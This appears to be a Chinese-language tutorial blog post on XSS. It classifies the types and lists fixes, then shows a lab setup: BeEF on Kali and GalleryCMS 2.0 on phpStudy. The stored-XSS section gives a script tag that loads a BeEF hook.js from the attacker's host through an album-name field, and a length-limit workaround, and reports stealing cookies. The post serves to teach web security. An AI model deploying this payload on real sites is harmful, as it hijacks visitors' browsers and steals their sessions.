目录

1.了解XSS漏洞

1.1XSS漏洞的分类

1.2XSS漏洞修复方法

2.工具的安装使用

1.1.Beefhttp://beefproject.com

​编辑

1.2phpstudy_pro搭建网站GalleryCMS-2.0

3.存储型xss漏洞利用

1.了解XSS漏洞

XSS又叫CSS（Cross Site Script），跨站脚本攻击。它指的是恶意攻击者往Web页面
里插入恶意JS代码，当用户浏览该页之时，嵌入其中Web里面的JS代码会被执行，从而
达到恶意的特殊目的。
利用我们所知道的各种黑魔法，向Web页面插入JS代码，让JS代码可以被浏览器执行，
访问该页面的用户则被攻击

1.1XSS漏洞的分类

1.反射型
非存储型，就是通过get或者post请求时，被后端处理过数据，并且响应到前端页面上
2.存储型
XSS代码被存储到服务器上的数据库里的某张表的字段里，或者页面，或者某个上传文件里，此类型危害最大
3.DOM型
仅仅在前段页面进行操作的

1.2XSS漏洞修复方法

1.HTML实体编码
2.使用白名单过滤掉用户输入的恶意字符
3.根据业务场景对症下药

2.工具的安装使用

1.1.Beef
http://beefproject.com

一个挖漏洞项目，可以将它的hook.js通过XSS的方法被存储到某个网站，然后那个网站只要访问这个页面信息，那么整个网站就被监控了

Kali安装beef

输入以下命令

apt-get install beef-xss

 根据提示输入以下命令

apt-get update

 再次输入安装命令

apt-get install beef-xss

安装apt --fix-broken install

 运行beef，输入beef-xss

 至此beef安装成功

1.2phpstudy_pro搭建网站GalleryCMS-2.0

先将解压包解压到phpstudy_pro/WWW目录下面，然后找到文件application/config/database.php文件，修改文件中的数据库的用户名和密码为自己本机上的用户名和密码一致

 以下是我的配置条件

3.存储型xss漏洞利用

打开kali,输入beef-xss开启beef服务，在kali上登录刚刚配置的网站

在物理机登录beef

 刚开始进行绕过时会出现字符长度过长的问题（配置文件默认45个字符），修改数据库长度改成85

 在网站创建相册名的输入框输入：

<script>$.getScript("//192.168.1.128:3000/hook.js")</script>

 此时beef已经监听，查看beef

 此时查看设备已经在线，可以看到已经拿到了服务端那里的cookie，并且可以任意修改网站的配置文件，危害十分巨大。